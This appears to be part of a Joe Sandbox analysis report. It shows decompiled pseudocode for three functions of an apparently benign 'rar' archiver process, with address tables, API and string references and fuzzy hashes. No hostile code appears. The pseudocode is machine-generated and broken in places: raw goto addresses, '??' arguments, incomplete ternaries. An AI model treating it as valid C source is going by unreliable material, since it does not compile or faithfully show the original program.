                                                                                                            Function 00007FF650B188B0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 303COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E00007FF67FF650B188B0(void* __rax, long long __rbx, intOrPtr* __rcx, signed long long __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* __rbp;
				signed int _t107;
				void* _t127;
				signed int _t128;
				void* _t130;
				void* _t159;
				signed long long _t206;
				intOrPtr _t211;
				long long _t212;
				void* _t215;
				signed long long _t216;
				signed long long _t218;
				signed long long _t219;
				signed long long _t221;
				signed long long _t222;
				intOrPtr _t223;
				intOrPtr _t228;
				void* _t258;
				signed long long _t260;
				void* _t297;
				intOrPtr* _t298;
				signed long long _t301;
				CHAR* _t303;
				long long* _t304;
				void* _t306;
				signed long long _t307;
				void* _t309;
				void* _t315;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;

				_t309 = __r8;
				 *((long long*)(_t306 + 0x18)) = __rbx;
				 *((long long*)(_t306 + 0x20)) = __rsi;
				_t304 = _t306 - 0xeac0;
				E00007FF67FF650B69CB0(0xebc0, __rax, _t316, _t317);
				_t307 = _t306 - __rax;
				_t206 =  *0x50b978f0; // 0x27db226282f1
				 *(_t304 + 0xeab0) = _t206 ^ _t307;
				_t301 = __rdx;
				_t298 = __rcx;
				r12d = 0;
				_t5 = _t319 + 1; // 0x1
				r15d = _t5;
				if ( *((intOrPtr*)(__rcx + 0x7f78)) != r15d) goto 0x50b18939;
				r8d = 0;
				 *0x50b80550();
				r14d = E00007FF67FF650B32138(__rcx) & 0x000000ff;
				r14d = r14d + ((E00007FF67FF650B32138(__rcx) & 0x000000ff) << 8);
				goto 0x50b1899e;
				if ( *((intOrPtr*)(__rcx + 0x34bc)) == r12b) goto 0x50b18d1b;
				r8d = 0;
				 *0x50b80550();
				E00007FF67FF650B1E5A8(__rcx, __rcx, _t301);
				if ( *((intOrPtr*)( *__rcx + 0x20)) == 0) goto 0x50b18d17;
				if ( *((intOrPtr*)(__rcx + 0x22ec)) != 0x75) goto 0x50b18d17;
				if ( *((intOrPtr*)(__rcx + 0x7f90)) != r12b) goto 0x50b18d09;
				r14d =  *(__rcx + 0x7bb4);
				if (r14d - 0xd < 0) goto 0x50b18d09;
				r14d = r14d + 0xfffffff3;
				if ( *((intOrPtr*)(__rcx + 0x7f78)) != r15d) goto 0x50b18a23;
				if ( *((intOrPtr*)(__rcx + 0x34bd)) != r12b) goto 0x50b18a49;
				if (r14d == 0) goto 0x50b18d17;
				E00007FF67FF650B11344( *((intOrPtr*)( *__rcx + 0x20)), _t307 + 0x30);
				r8d = r14d;
				_t211 =  *((intOrPtr*)( *__rcx + 0x18));
				_t107 =  *0x50b80550();
				if (_t107 < 0) goto 0x50b18c3a;
				if (_t107 - r14d >= 0) goto 0x50b18c3a;
				r14d = _t107;
				if (_t211 -  *((intOrPtr*)(_t307 + 0x40)) <= 0) goto 0x50b18c35;
				_t212 = _t211 -  *(_t307 + 0x38);
				E00007FF67FF650B11754( *((intOrPtr*)(_t307 + 0x30)), _t307 + 0x30, _t212, _t301, _t323);
				_t227 =  *((intOrPtr*)(_t307 + 0x30));
				goto 0x50b18c3a;
				if ( *((char*)(_t298 + 0x7bbf)) == 0x30) goto 0x50b189b4;
				if ( *(_t298 + 0x7bbe) - 0xf - 0xe > 0) goto 0x50b18d17;
				if ( *((char*)(_t298 + 0x7bbf)) - 0x35 > 0) goto 0x50b18d17;
				E00007FF67FF650B4934C( *((char*)(_t298 + 0x7bbf)) - 0x35, _t212,  *((intOrPtr*)(_t307 + 0x30)), _t307 + 0x60, _t315);
				 *((intOrPtr*)(_t304 + 0x11)) = r15b;
				if ( *((intOrPtr*)(_t298 + 0x7f78)) != r15d) goto 0x50b18a9d;
				E00007FF67FF650B32138(_t298);
				E00007FF67FF650B32138(_t298);
				if (r14d - 2 < 0) goto 0x50b18b66;
				r14d = r14d + 0xfffffffe;
				E00007FF67FF650B49B2C(r14d, _t307 + 0x60);
				 *(_t298 + 0x7bbe) = 0xf;
				goto 0x50b18aa4;
				r8d = 0;
				E00007FF67FF650B49BBC(_t212, _t307 + 0x60, _t298, _t309);
				 *((intOrPtr*)(_t304 + 0x10)) = r12b;
				 *((long long*)(_t304 + 8)) = _t212;
				 *_t304 = _t212;
				r8d = r15d;
				E00007FF67FF650B366EC(2,  *((intOrPtr*)(_t307 + 0x30)), _t304 + 0x108, _t301, _t316, _t317);
				 *((intOrPtr*)(_t304 + 0x13)) = r15b;
				E00007FF67FF650B5D710(_t159, r14d - 2, _t212,  *((intOrPtr*)(_t307 + 0x30)), _t304 + 0x130, _t307 + 0x60, _t301);
				r8d = 0;
				E00007FF67FF650B5FCF0(0x10000,  *((intOrPtr*)(_t307 + 0x30)), _t304 + 0x130, _t307 + 0x60, _t298, _t301, _t304, _t309, _t321, _t319);
				 *((long long*)(_t304 + 0x4ee8)) = _t212;
				 *((intOrPtr*)(_t304 + 0x4f00)) = r12b;
				r8d = 0;
				0x50b5f0bc();
				if ( *((intOrPtr*)(_t298 + 0x7f78)) == r15d) goto 0x50b18b75;
				if ((E00007FF67FF650B366DC(_t304 + 0x108) & 0x0000ffff) == ( *(_t298 + 0x7bc0) & 0x0000ffff)) goto 0x50b18b75;
				E00007FF67FF650B111C0(0x3a, _t298 + 0x3a);
				E00007FF67FF650B5D8F0(_t212,  *((intOrPtr*)(_t307 + 0x30)), _t304 + 0x130);
				_t127 = E00007FF67FF650B49414( *(_t298 + 0x7bbe) & 0x000000ff, _t212, _t227, _t307 + 0x60, _t298 + 0x3a, _t301, _t309, _t315);
				goto 0x50b18d17;
				_t128 = E00007FF67FF650B49590(_t127, _t307 + 0x60, _t307 + 0x28, _t307 + 0x20);
				if ( *((intOrPtr*)(_t307 + 0x20)) == 0) goto 0x50b18c19;
				r8d = _t128;
				OemToCharBuffA(??, ??, ??);
				_t215 =  *((intOrPtr*)(_t307 + 0x20)) + 1;
				if (_t215 -  *((intOrPtr*)(_t301 + 0x10)) <= 0) goto 0x50b18bc7;
				_t216 = _t215 -  *(_t301 + 8);
				_t130 = E00007FF67FF650B177C8(_t227, _t301, _t216, _t298, _t301);
				goto 0x50b18bcb;
				 *(_t301 + 8) = _t216;
				E00007FF67FF650B6C1A0(_t130, 0,  *_t301, _t216,  *(_t301 + 8) +  *(_t301 + 8));
				E00007FF67FF650B5D098( *(_t298 + 0x7bbc) & 0x0000ffff, _t227,  *((intOrPtr*)(_t307 + 0x28)),  *_t301, _t301,  *(_t301 + 8), _t297);
				_t218 = (_t216 | 0xffffffff) + 1;
				if ( *((intOrPtr*)( *_t301 + _t218 * 2)) != r12w) goto 0x50b18bf4;
				if (_t218 -  *((intOrPtr*)(_t301 + 0x10)) <= 0) goto 0x50b18c15;
				_t219 = _t218 -  *(_t301 + 8);
				E00007FF67FF650B177C8(_t227, _t301, _t219, _t298, _t301);
				goto 0x50b18c19;
				 *(_t301 + 8) = _t219;
				E00007FF67FF650B5D8F0(_t219, _t227, _t304 + 0x130);
				E00007FF67FF650B49414(0, _t219, _t227, _t307 + 0x60, _t219, _t301,  *(_t301 + 8), _t315);
				goto 0x50b18d00;
				 *(_t307 + 0x38) = _t219;
				if ( *((intOrPtr*)(_t298 + 0x7f78)) == r15d) goto 0x50b18c7f;
				r8d = r14d;
				if (( *(_t298 + 0x7bc0) & 0x0000ffff) == ( !(E00007FF67FF650B28538( *(_t298 + 0x7bbc) & 0x0000ffff, 0xffffffff, _t219, _t227, _t307 + 0x60, _t227, _t298, _t301,  *(_t301 + 8))) & 0x0000ffff)) goto 0x50b18c7f;
				E00007FF67FF650B111C0(0x3a, _t298 + 0x3a);
				_t258 = _t307 + 0x30;
				E00007FF67FF650B11534(_t258);
				goto 0x50b18d17;
				if (_t258 -  *((intOrPtr*)(_t301 + 0x10)) <= 0) goto 0x50b18c9a;
				_t260 = _t301;
				E00007FF67FF650B177C8(_t227, _t260, _t258 -  *(_t301 + 8), _t298, _t301);
				goto 0x50b18c9e;
				 *(_t301 + 8) = _t260;
				E00007FF67FF650B197D0(0, _t227, _t307 + 0x30,  *(_t301 + 8));
				_t228 =  *((intOrPtr*)(_t307 + 0x30));
				OemToCharA(_t303);
				E00007FF67FF650B5D098( *(_t298 + 0x7bbc) & 0x0000ffff, _t228, _t228,  *_t301, _t301,  *(_t301 + 8));
				_t221 = (_t219 | 0xffffffff) + 1;
				if ( *((intOrPtr*)( *_t301 + _t221 * 2)) != r12w) goto 0x50b18cd1;
				if (_t221 -  *((intOrPtr*)(_t301 + 0x10)) <= 0) goto 0x50b18cf2;
				_t222 = _t221 -  *(_t301 + 8);
				E00007FF67FF650B177C8(_t228, _t301, _t222, _t298, _t301);
				goto 0x50b18cf6;
				 *(_t301 + 8) = _t222;
				E00007FF67FF650B11534(_t307 + 0x30);
				goto 0x50b18d5c;
				E00007FF67FF650B111C0(0x3a, _t298 + 0x3a);
				goto 0x50b18d5c;
				E00007FF67FF650B1C330(_t222, _t228, _t307 + 0x30);
				r8d = 0;
				_t223 =  *((intOrPtr*)(_t228 + 0x20));
				 *0x50b80550();
				E00007FF67FF650B1EB04( *(_t301 + 8) - _t319, _t223, _t228, _t298, L"CMT", _t301, _t304);
				if (_t223 == 0) goto 0x50b18d56;
				E00007FF67FF650B19864(_t228, _t298, _t301, _t298, _t301,  *(_t301 + 8));
				if (0 != 0) goto 0x50b18d59;
				r15b = r12b;
				return E00007FF67FF650B69D10(r15b, 0x3a,  *(_t304 + 0xeab0) ^ _t307);
			}





































                                                                                                            0x7ff650b188b0
                                                                                                            0x7ff650b188b0
                                                                                                            0x7ff650b188b5
                                                                                                            0x7ff650b188c2
                                                                                                            0x7ff650b188cf
                                                                                                            0x7ff650b188d4
                                                                                                            0x7ff650b188d7
                                                                                                            0x7ff650b188e1
                                                                                                            0x7ff650b188e8
                                                                                                            0x7ff650b188eb
                                                                                                            0x7ff650b188f1
                                                                                                            0x7ff650b188f4
                                                                                                            0x7ff650b188f4
                                                                                                            0x7ff650b18900
                                                                                                            0x7ff650b1890d
                                                                                                            0x7ff650b18914
                                                                                                            0x7ff650b18922
                                                                                                            0x7ff650b18934
                                                                                                            0x7ff650b18937
                                                                                                            0x7ff650b18940
                                                                                                            0x7ff650b18951
                                                                                                            0x7ff650b18958
                                                                                                            0x7ff650b18961
                                                                                                            0x7ff650b18969
                                                                                                            0x7ff650b18976
                                                                                                            0x7ff650b18983
                                                                                                            0x7ff650b18989
                                                                                                            0x7ff650b18994
                                                                                                            0x7ff650b1899a
                                                                                                            0x7ff650b189a5
                                                                                                            0x7ff650b189ae
                                                                                                            0x7ff650b189b7
                                                                                                            0x7ff650b189c5
                                                                                                            0x7ff650b189ce
                                                                                                            0x7ff650b189dc
                                                                                                            0x7ff650b189e0
                                                                                                            0x7ff650b189e8
                                                                                                            0x7ff650b189f1
                                                                                                            0x7ff650b189f7
                                                                                                            0x7ff650b18a01
                                                                                                            0x7ff650b18a07
                                                                                                            0x7ff650b18a14
                                                                                                            0x7ff650b18a19
                                                                                                            0x7ff650b18a1e
                                                                                                            0x7ff650b18a2a
                                                                                                            0x7ff650b18a36
                                                                                                            0x7ff650b18a43
                                                                                                            0x7ff650b18a4e
                                                                                                            0x7ff650b18a54
                                                                                                            0x7ff650b18a5f
                                                                                                            0x7ff650b18a64
                                                                                                            0x7ff650b18a6f
                                                                                                            0x7ff650b18a80
                                                                                                            0x7ff650b18a86
                                                                                                            0x7ff650b18a8f
                                                                                                            0x7ff650b18a94
                                                                                                            0x7ff650b18a9b
                                                                                                            0x7ff650b18aa4
                                                                                                            0x7ff650b18aaf
                                                                                                            0x7ff650b18ab4
                                                                                                            0x7ff650b18abb
                                                                                                            0x7ff650b18abf
                                                                                                            0x7ff650b18ac3
                                                                                                            0x7ff650b18ad2
                                                                                                            0x7ff650b18ad7
                                                                                                            0x7ff650b18ae7
                                                                                                            0x7ff650b18aed
                                                                                                            0x7ff650b18afc
                                                                                                            0x7ff650b18b03
                                                                                                            0x7ff650b18b0a
                                                                                                            0x7ff650b18b18
                                                                                                            0x7ff650b18b22
                                                                                                            0x7ff650b18b2e
                                                                                                            0x7ff650b18b48
                                                                                                            0x7ff650b18b53
                                                                                                            0x7ff650b18b60
                                                                                                            0x7ff650b18b6b
                                                                                                            0x7ff650b18b70
                                                                                                            0x7ff650b18b84
                                                                                                            0x7ff650b18b91
                                                                                                            0x7ff650b18b97
                                                                                                            0x7ff650b18ba2
                                                                                                            0x7ff650b18bad
                                                                                                            0x7ff650b18bb4
                                                                                                            0x7ff650b18bb6
                                                                                                            0x7ff650b18bc0
                                                                                                            0x7ff650b18bc5
                                                                                                            0x7ff650b18bc7
                                                                                                            0x7ff650b18bd7
                                                                                                            0x7ff650b18be8
                                                                                                            0x7ff650b18bf4
                                                                                                            0x7ff650b18bfc
                                                                                                            0x7ff650b18c02
                                                                                                            0x7ff650b18c04
                                                                                                            0x7ff650b18c0e
                                                                                                            0x7ff650b18c13
                                                                                                            0x7ff650b18c15
                                                                                                            0x7ff650b18c20
                                                                                                            0x7ff650b18c2b
                                                                                                            0x7ff650b18c30
                                                                                                            0x7ff650b18c35
                                                                                                            0x7ff650b18c41
                                                                                                            0x7ff650b18c43
                                                                                                            0x7ff650b18c5f
                                                                                                            0x7ff650b18c6a
                                                                                                            0x7ff650b18c70
                                                                                                            0x7ff650b18c75
                                                                                                            0x7ff650b18c7a
                                                                                                            0x7ff650b18c87
                                                                                                            0x7ff650b18c90
                                                                                                            0x7ff650b18c93
                                                                                                            0x7ff650b18c98
                                                                                                            0x7ff650b18c9a
                                                                                                            0x7ff650b18ca5
                                                                                                            0x7ff650b18caa
                                                                                                            0x7ff650b18cb5
                                                                                                            0x7ff650b18cc5
                                                                                                            0x7ff650b18cd1
                                                                                                            0x7ff650b18cd9
                                                                                                            0x7ff650b18cdf
                                                                                                            0x7ff650b18ce1
                                                                                                            0x7ff650b18ceb
                                                                                                            0x7ff650b18cf0
                                                                                                            0x7ff650b18cf2
                                                                                                            0x7ff650b18cfb
                                                                                                            0x7ff650b18d07
                                                                                                            0x7ff650b18d12
                                                                                                            0x7ff650b18d19
                                                                                                            0x7ff650b18d1b
                                                                                                            0x7ff650b18d23
                                                                                                            0x7ff650b18d29
                                                                                                            0x7ff650b18d2d
                                                                                                            0x7ff650b18d3d
                                                                                                            0x7ff650b18d45
                                                                                                            0x7ff650b18d4d
                                                                                                            0x7ff650b18d54
                                                                                                            0x7ff650b18d56
                                                                                                            0x7ff650b18d86

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Buff
                                                                                                            • String ID: CMT
                                                                                                            • API String ID: 2837692540-2756464174
                                                                                                            • Opcode ID: cc325429d9bc1ca2726f5b789983d9baf2adfcc16592cfb8be9b0207a26824d6
                                                                                                            • Instruction ID: 601d0635cedca77be279f87863c9d672de8202c40d8a218fca3fe0eda8f0bff6
                                                                                                            • Opcode Fuzzy Hash: cc325429d9bc1ca2726f5b789983d9baf2adfcc16592cfb8be9b0207a26824d6
                                                                                                            • Instruction Fuzzy Hash: 3FD1E222A1C683A2EA249B25D4C01BD63A1FF57780F184435DA9FA7BE5CF3EE551C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B78344 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E00007FF67FF650B78344(void* __edx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
				long long _v72;
				intOrPtr _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t33;
				void* _t37;
				intOrPtr* _t66;
				signed long long _t68;
				long long _t70;
				long long _t72;
				long long _t78;
				void* _t83;
				void* _t90;
				long long _t104;
				long long _t108;
				void* _t110;
				intOrPtr* _t112;
				void* _t114;
				void* _t117;
				intOrPtr _t129;
				void* _t131;
				void* _t132;
				signed long long _t133;
				signed long long _t134;
				signed long long _t137;
				intOrPtr* _t138;

				_t66 = __rax;
				_a8 = __rbx;
				_a16 = __rdx;
				if (__rdx != 0) goto 0x50b78380;
				_t33 = E00007FF67FF650B74DAC(__rax);
				_t3 = _t108 + 0x16; // 0x16
				 *__rax = _t3;
				E00007FF67FF650B74C8C(_t33);
				goto 0x50b78520;
				asm("xorps xmm0, xmm0");
				 *((long long*)(__rdx)) = _t108;
				asm("movdqu [ebp-0x20], xmm0");
				_v72 = _t108;
				if ( *__rcx == _t108) goto 0x50b783eb;
				_a24 = 0x3f2a;
				_a26 = dil;
				E00007FF67FF650B734F0( *__rcx,  &_a24);
				if (_t66 != 0) goto 0x50b783c2;
				r8d = 0;
				_t37 = E00007FF67FF650B78550(__rcx,  *__rcx,  &_a24, _t108, _t110, _t114, _t117,  &_v88);
				goto 0x50b783ce;
				0x50b78660();
				r14d = _t37;
				if (_t37 != 0) goto 0x50b783de;
				goto 0x50b78392;
				goto 0x50b784e4;
				_t112 = _v88;
				_t129 = _v80;
				_a24 = _t108;
				_t68 = _t129 - _t112;
				_t137 = (_t68 >> 3) + 1;
				_t90 =  >  ? _t108 : _t68 + 7 >> 3;
				_t134 = _t133 | 0xffffffff;
				if (_t90 == 0) goto 0x50b7844d;
				_t70 = _t134 + 1;
				if ( *((intOrPtr*)( *_t112 + _t70)) != dil) goto 0x50b7842e;
				if (_t108 + 1 != _t90) goto 0x50b78428;
				_a24 = _t108 + 1 + _t70;
				r8d = 1;
				E00007FF67FF650B73980(_t137, _t108 + 1 + _t70, _t108 + 1);
				_t78 = _t70;
				if (_t70 == 0) goto 0x50b784dd;
				_t104 = _t70 + _t137 * 8;
				_t138 = _t112;
				_v96 = _t104;
				_a32 = _t104;
				if (_t112 == _t129) goto 0x50b784d3;
				_v104 = _t78 - _t112;
				_t131 = _t134 + 1;
				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x50b7848d;
				_t132 = _t131 + 1;
				if (E00007FF67FF650B7CD04(0, _t104, _t78, _t104, _t104 - _t104 + _a24, _t132) != 0) goto 0x50b78538;
				_t72 = _a32;
				 *((long long*)(_v104 + _t138)) = _t72;
				_a32 = _t72 + _t132;
				if (_t138 + 8 != _t129) goto 0x50b78487;
				r14d = 0;
				 *_a16 = _t78;
				E00007FF67FF650B7495C(_a16, _v104);
				_t83 =  >  ? _t108 : _t129 - _t112 + 7 >> 3;
				if (_t83 == 0) goto 0x50b78515;
				E00007FF67FF650B7495C(_a16,  *_t112);
				if (_t108 + 1 != _t83) goto 0x50b78501;
				E00007FF67FF650B7495C(_a16, _t112);
				return r14d;
			}

































                                                                                                            0x7ff650b78344
                                                                                                            0x7ff650b78344
                                                                                                            0x7ff650b78349
                                                                                                            0x7ff650b78368
                                                                                                            0x7ff650b7836a
                                                                                                            0x7ff650b7836f
                                                                                                            0x7ff650b78372
                                                                                                            0x7ff650b78374
                                                                                                            0x7ff650b7837b
                                                                                                            0x7ff650b78380
                                                                                                            0x7ff650b78383
                                                                                                            0x7ff650b78389
                                                                                                            0x7ff650b7838e
                                                                                                            0x7ff650b78392
                                                                                                            0x7ff650b7839b
                                                                                                            0x7ff650b783a1
                                                                                                            0x7ff650b783a5
                                                                                                            0x7ff650b783b0
                                                                                                            0x7ff650b783b6
                                                                                                            0x7ff650b783bb
                                                                                                            0x7ff650b783c0
                                                                                                            0x7ff650b783c9
                                                                                                            0x7ff650b783ce
                                                                                                            0x7ff650b783d3
                                                                                                            0x7ff650b783dc
                                                                                                            0x7ff650b783e6
                                                                                                            0x7ff650b783eb
                                                                                                            0x7ff650b783f2
                                                                                                            0x7ff650b783fc
                                                                                                            0x7ff650b78400
                                                                                                            0x7ff650b7840d
                                                                                                            0x7ff650b7841b
                                                                                                            0x7ff650b7841f
                                                                                                            0x7ff650b78426
                                                                                                            0x7ff650b7842e
                                                                                                            0x7ff650b78435
                                                                                                            0x7ff650b78447
                                                                                                            0x7ff650b78449
                                                                                                            0x7ff650b7844d
                                                                                                            0x7ff650b78459
                                                                                                            0x7ff650b7845e
                                                                                                            0x7ff650b78464
                                                                                                            0x7ff650b78466
                                                                                                            0x7ff650b7846a
                                                                                                            0x7ff650b7846d
                                                                                                            0x7ff650b78474
                                                                                                            0x7ff650b7847b
                                                                                                            0x7ff650b78483
                                                                                                            0x7ff650b7848d
                                                                                                            0x7ff650b78494
                                                                                                            0x7ff650b78499
                                                                                                            0x7ff650b784ad
                                                                                                            0x7ff650b784b3
                                                                                                            0x7ff650b784bf
                                                                                                            0x7ff650b784ca
                                                                                                            0x7ff650b784d1
                                                                                                            0x7ff650b784d7
                                                                                                            0x7ff650b784da
                                                                                                            0x7ff650b784df
                                                                                                            0x7ff650b784f8
                                                                                                            0x7ff650b784ff
                                                                                                            0x7ff650b78504
                                                                                                            0x7ff650b78513
                                                                                                            0x7ff650b78518
                                                                                                            0x7ff650b78537

                                                                                                            APIs
                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF650B78374
                                                                                                              • Part of subcall function 00007FF650B74CAC: GetCurrentProcess.KERNEL32(00007FF650B79935), ref: 00007FF650B74CD9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                            • String ID: *?$.
                                                                                                            • API String ID: 2518042432-3972193922
                                                                                                            • Opcode ID: 54e720d16ee85fdeded61f8b9c1a4a6739353385cb397fec6fffe6d1f60c1714
                                                                                                            • Instruction ID: 056f7e4c7364689780eae2dcd72f8301b9858399bd9c766589ceb789669d13d5
                                                                                                            • Opcode Fuzzy Hash: 54e720d16ee85fdeded61f8b9c1a4a6739353385cb397fec6fffe6d1f60c1714
                                                                                                            • Instruction Fuzzy Hash: B8511422F14B97A5EF10CFA598804BD63A4FB55BD8B484531EE1EA7B85EF3DE0418300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B46D4C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E00007FF67FF650B46D4C(void* __ecx, signed int __edx, signed int __rbx, long long* __rcx, void* __rdx, long long __rsi, unsigned long long __r8, void* __r9, void* __r10, signed int __r11, long long _a16, long long _a24) {
				signed int _v16;
				char _v56;
				unsigned int _t56;
				unsigned int _t64;
				signed int _t92;
				signed long long _t101;
				signed long long _t102;
				unsigned long long _t107;
				signed long long _t109;
				signed int _t111;
				void* _t122;
				signed long long _t125;
				signed long long _t129;
				long long* _t132;
				unsigned long long _t134;
				void* _t136;
				char* _t141;
				unsigned long long _t145;
				void* _t146;

				_t146 = __r9;
				_t111 = __rbx;
				_a16 = __rbx;
				_a24 = __rsi;
				_t101 =  *0x50b978f0; // 0x27db226282f1
				_t102 = _t101 ^ _t136 - 0x00000050;
				_v16 = _t102;
				_t134 = __r8;
				asm("cdq");
				_t132 = __rcx;
				_t56 = (__edx ^ __edx) - __edx;
				 *(__rcx + 0x60) = _t56;
				if (_t56 - 0x3e8 <= 0) goto 0x50b46db8;
				r9d = _t56;
				E00007FF67FF650B1657C(__ecx, _t102,  &_v56, __rdx, L"-rr%u", __r9);
				_t141 = L"1000";
				_t129 =  &_v56;
				_t7 = _t111 - 0x64; // 0x64
				E00007FF67FF650B112C8(_t7, _t129, _t141);
				 *(_t132 + 0x60) = 0xc8;
				r9d = _t102 + _t102;
				 *(_t132 + 0x44) = 0xc8;
				r10d = 0;
				 *(_t132 + 0x48) = r9d;
				_t92 = _t134 & 0x000003ff;
				r8d = r10d;
				r8b = _t92 != 0;
				r11d = __r10 + 1;
				if (_t92 != 0) goto 0x50b46dec;
				r8d = r11d;
				goto 0x50b46df1;
				if (_t141 + (_t134 >> 0xa) - __rbx >= 0) goto 0x50b46e3a;
				 *(_t132 + 0x44) = r8d;
				r9d = 0xcccccccd * (r9d << 2) >> 0x20;
				r9d = r9d >> 2;
				 *(_t132 + 0x48) = r9d;
				if (r9d != 0) goto 0x50b46e3a;
				 *(_t132 + 0x48) = r11d;
				r9d = r11d;
				_t64 = __rbx + __rbx * 4 + __rbx + __rbx * 4;
				if (r9d - _t64 <= 0) goto 0x50b46e4a;
				 *(_t132 + 0x48) = _t64;
				r9d = _t64;
				 *((intOrPtr*)(_t132 + 0x4c)) = _t146 + __rbx;
				_t107 = _t134;
				_t145 = (__r10 + _t107 & __r11) + __r10 + _t107;
				 *(_t132 + 0x50) = _t145;
				_t122 = _t145 + 0x10000;
				_t108 =  >  ? _t122 : _t107;
				_t109 = ( >  ? _t122 : _t107) & 0xffff0000;
				_t110 =  <  ? _t122 : _t109;
				 *_t132 =  <  ? _t122 : _t109;
				r10b = r8w != 0;
				_t125 = (_t145 >> 0x10) + __r10;
				 *(_t132 + 0x70) = _t125;
				 *((long long*)(_t132 + 0x68)) = _t129 * _t125 + _t145;
				return E00007FF67FF650B69D10(0x10000000 / (__r10 + _t107), 0x10000, _v16 ^ _t136 - 0x00000050);
			}






















                                                                                                            0x7ff650b46d4c
                                                                                                            0x7ff650b46d4c
                                                                                                            0x7ff650b46d4c
                                                                                                            0x7ff650b46d51
                                                                                                            0x7ff650b46d5b
                                                                                                            0x7ff650b46d62
                                                                                                            0x7ff650b46d65
                                                                                                            0x7ff650b46d6c
                                                                                                            0x7ff650b46d6f
                                                                                                            0x7ff650b46d70
                                                                                                            0x7ff650b46d7a
                                                                                                            0x7ff650b46d7c
                                                                                                            0x7ff650b46d84
                                                                                                            0x7ff650b46d86
                                                                                                            0x7ff650b46d9a
                                                                                                            0x7ff650b46d9f
                                                                                                            0x7ff650b46da6
                                                                                                            0x7ff650b46dab
                                                                                                            0x7ff650b46dae
                                                                                                            0x7ff650b46db5
                                                                                                            0x7ff650b46db8
                                                                                                            0x7ff650b46dbc
                                                                                                            0x7ff650b46dbf
                                                                                                            0x7ff650b46dc5
                                                                                                            0x7ff650b46dc9
                                                                                                            0x7ff650b46dd0
                                                                                                            0x7ff650b46dd6
                                                                                                            0x7ff650b46dde
                                                                                                            0x7ff650b46de5
                                                                                                            0x7ff650b46de7
                                                                                                            0x7ff650b46dea
                                                                                                            0x7ff650b46def
                                                                                                            0x7ff650b46e02
                                                                                                            0x7ff650b46e23
                                                                                                            0x7ff650b46e26
                                                                                                            0x7ff650b46e2a
                                                                                                            0x7ff650b46e31
                                                                                                            0x7ff650b46e33
                                                                                                            0x7ff650b46e37
                                                                                                            0x7ff650b46e3d
                                                                                                            0x7ff650b46e42
